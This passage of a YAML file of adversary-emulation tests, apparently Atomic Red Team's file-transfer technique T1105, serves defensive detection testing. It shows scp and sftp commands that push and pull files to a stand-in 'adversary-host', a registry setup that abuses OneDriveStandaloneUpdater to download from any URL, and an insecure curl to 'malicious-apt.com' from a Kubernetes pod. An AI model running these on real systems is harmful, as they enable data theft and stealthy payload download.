get_prereq_command: | # Define the capability name for OpenSSH Client $capabilityName = "OpenSSH.Client~~~~0.0.1.0" try { # Install the OpenSSH Client capability Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop Write-Host "OpenSSH Client has been successfully installed." 
-ForegroundColor Green } catch { # Handle any errors that occur during the installation process Write-Host "An error occurred while installing OpenSSH Client: $_" -ForegroundColor Red } executor: elevation_required: true name: powershell command: | # Check if the folder exists, create it if it doesn't $folderPath = "#{local_path}" if (-Not (Test-Path -Path $folderPath)) { New-Item -Path $folderPath -ItemType Directory } # Create the file $filePath = Join-Path -Path $folderPath -ChildPath "#{file_name}" New-Item -Path $filePath -ItemType File -Force Write-Output "File created: $filePath" # Attack command scp.exe #{local_path}\#{file_name} #{username}@#{remote_host}:#{remote_path} cleanup_command: | $filePath = Join-Path -Path "#{local_path}" -ChildPath "#{file_name}" Remove-Item -Path $filePath -Force -erroraction silentlycontinue Write-Output "File deleted: $filePath" - name: Windows pull file using scp.exe auto_generated_guid: 401667dc-05a6-4da0-a2a7-acfe4819559c description: | This test simulates pulling files using SCP on a Windows environment. supported_platforms: - windows input_arguments: remote_path: description: Path of folder to pull type: path default: /tmp/T1105.txt remote_host: description: Remote host to pull from type: string default: adversary-host local_path: description: Local path to receive files type: path default: C:\temp username: description: User account to authenticate on remote host type: string default: adversary dependency_executor_name: powershell dependencies: - description: | This test requires the `scp` command to be available on the system. prereq_command: | if (Get-Command scp -ErrorAction SilentlyContinue) { Write-Output "SCP command is available." exit 0 } else { Write-Output "SCP command is not available." 
exit 1 } get_prereq_command: | # Define the capability name for OpenSSH Client $capabilityName = "OpenSSH.Client~~~~0.0.1.0" try { # Install the OpenSSH Client capability Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop Write-Host "OpenSSH Client has been successfully installed." -ForegroundColor Green } catch { # Handle any errors that occur during the installation process Write-Host "An error occurred while installing OpenSSH Client: $_" -ForegroundColor Red } executor: elevation_required: true name: powershell command: | scp.exe #{username}@#{remote_host}:#{remote_path} #{local_path} - name: Windows push file using sftp.exe auto_generated_guid: 205e676e-0401-4bae-83a5-94b8c5daeb22 description: | This test simulates pushing files using SFTP on a Windows environment. supported_platforms: - windows input_arguments: remote_path: description: Path of folder to copy type: path default: /tmp remote_host: description: Remote host to send type: string default: adversary-host local_path: description: Local path to receive sftp type: path default: C:\temp file_name: description: Name of the file to transfer type: string default: T1105.txt username: description: User account to authenticate on remote host type: string default: adversary dependency_executor_name: powershell dependencies: - description: | This test requires the `sftp` command to be available on the system. prereq_command: | if (Get-Command sftp -ErrorAction SilentlyContinue) { Write-Output "SFTP command is available." exit 0 } else { Write-Output "SFTP command is not available." exit 1 } get_prereq_command: | # Define the capability name for OpenSSH Client $capabilityName = "OpenSSH.Client~~~~0.0.1.0" try { # Install the OpenSSH Client capability Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop Write-Host "OpenSSH Client has been successfully installed." 
-ForegroundColor Green } catch { # Handle any errors that occur during the installation process Write-Host "An error occurred while installing OpenSSH Client: $_" -ForegroundColor Red } executor: elevation_required: true name: powershell command: | # Check if the folder exists, create it if it doesn't $folderPath = "#{local_path}" if (-Not (Test-Path -Path $folderPath)) { New-Item -Path $folderPath -ItemType Directory } # Create the file $filePath = Join-Path -Path $folderPath -ChildPath "#{file_name}" New-Item -Path $filePath -ItemType File -Force Write-Output "File created: $filePath" # Attack command echo "put #{local_path}\#{file_name}" | sftp #{username}@#{remote_host}:#{remote_path} cleanup_command: | $filePath = Join-Path -Path "#{local_path}" -ChildPath "#{file_name}" Remove-Item -Path $filePath -Force Write-Output "File deleted: $filePath" - name: Windows pull file using sftp.exe auto_generated_guid: 3d25f1f2-55cb-4a41-a523-d17ad4cfba19 description: | This test simulates pulling files using SFTP on a Windows environment. supported_platforms: - windows input_arguments: remote_path: description: Path of file to pull type: path default: /tmp/T1105.txt remote_host: description: Remote host to pull from type: string default: adversary-host local_path: description: Local path to receive files type: path default: C:\temp username: description: User account to authenticate on remote host type: string default: adversary dependency_executor_name: powershell dependencies: - description: | This test requires the `sftp` command to be available on the system. prereq_command: | if (Get-Command sftp -ErrorAction SilentlyContinue) { Write-Output "SFTP command is available." exit 0 } else { Write-Output "SFTP command is not available." 
exit 1 } get_prereq_command: | # Define the capability name for OpenSSH Client $capabilityName = "OpenSSH.Client~~~~0.0.1.0" try { # Install the OpenSSH Client capability Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop Write-Host "OpenSSH Client has been successfully installed." -ForegroundColor Green } catch { # Handle any errors that occur during the installation process Write-Host "An error occurred while installing OpenSSH Client: $_" -ForegroundColor Red } executor: elevation_required: true name: powershell command: | sftp.exe #{username}@#{remote_host}:#{remote_path} #{local_path} - name: Download a file with OneDrive Standalone Updater auto_generated_guid: 3dd6a6cf-9c78-462c-bd75-e9b54fc8925b description: | Uses OneDrive Standalone Updater to download a file from a specified URL by setting up the required registry keys. This technique can be used to download files without executing anomalous executables. Reference: https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/ supported_platforms: - windows input_arguments: remote_url: description: URL to download file from type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt onedrive_path: description: Path to OneDrive Standalone Updater executable type: path default: 'C:\Users\$env:USERNAME\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe' dependency_executor_name: powershell dependencies: - description: | OneDriveStandaloneUpdater.exe must exist on disk at specified location prereq_command: | if (Test-Path "#{onedrive_path}") {exit 0} else {exit 1} get_prereq_command: | Write-Host "OneDriveStandaloneUpdater.exe not found at #{onedrive_path}. Please install OneDrive or specify correct path." executor: command: | if (-not (Test-Path "#{onedrive_path}")) { Write-Host "OneDriveStandaloneUpdater.exe not found at #{onedrive_path}. Test cannot continue." 
exit 1 } New-Item -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Force | Out-Null Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "UpdateRingSettingURLFromOC" -Value "#{remote_url}" -Type String -Force Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "ODSUUpdateXMLUrlFromOC" -Value "#{remote_url}" -Type String -Force Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "UpdateXMLUrlFromOC" -Value "#{remote_url}" -Type String -Force Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "UpdateOfficeConfigTimestamp" -Value 99999999999 -Type QWord -Force # Run OneDrive Standalone Updater & "#{onedrive_path}" cleanup_command: | Remove-Item -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Force -ErrorAction Ignore Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json" -Force -ErrorAction Ignore name: powershell elevation_required: false - name: Curl Insecure Connection from a Pod auto_generated_guid: 7e2ad0db-1efa-4af2-a77c-bc6e87d7b3f3 description: | Launches an Ubuntu pod, installs curl, and executes curl with insecure flags (-k/--insecure) against a target URL. The pod is automatically deleted after execution. supported_platforms: - containers input_arguments: pod_name: description: K8s pod_name to execute the command in type: string default: atomic-insecure-curl remote_url: description: Remote URL to curl type: string default: https://malicious-apt.com image_name: description: Name of the docker image type: string default: curlimages/curl dependencies: - description: kubectl must be installed and configured get_prereq_command: | echo "kubectl must be installed manually" prereq_command: | which kubectl executor: name: bash elevation_required: false command: | kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm -it -- curl -ksL #{remote_url}